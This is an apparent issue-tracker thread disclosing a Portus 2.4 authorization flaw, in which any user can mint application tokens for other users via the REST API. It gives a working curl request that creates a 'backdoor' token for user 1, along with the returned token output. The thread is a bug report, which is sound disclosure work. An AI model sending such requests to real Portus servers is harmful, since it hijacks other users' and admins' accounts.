Users can create application tokens for any user via the REST API

Question

Users can create application tokens for any user via the REST API

claudiocabral opened this issue 4 years ago · comments

Claudio Cabral commented 4 years ago

Description

It seems to me that any user can add application tokens to other users via the REST API.

Steps to reproduce

Create a new user (can be a bot) without admin privileges, teams or namespaces
Do a post request to create a new token for an arbitrary user

curl -X POST --header 'Accept: application/json' --header 'Content-Type: application/json' --header 'Portus-Auth: sneakyuser:app_token' --data '{"application":"backdoor"}'  'https://portus.mydomain.com/api/v1/users/1/application_tokens'

Get an application token for user 1

{"id":10,"application":"backdoor","plain_token":"a_valid_portus_token"}

Expected behavior: Users cannot create tokens for other users
Actual behavior: Users can create tokens for other users

Portus version: opensuse/portus:2.4

Lukas Bachschwell commented 3 years ago

?

stale · Answer 1 · Fri Dec 25 2020 21:25:23 GMT+0800 (China Standard Time)

Thanks for all your contributions!
This issue has been automatically marked as stale because it has not had recent activity. It will be closed if no further activity occurs.

Sisir · Answer 2 · Thu Jan 07 2021 16:43:01 GMT+0800 (China Standard Time)

This is a serious security issue any update on this?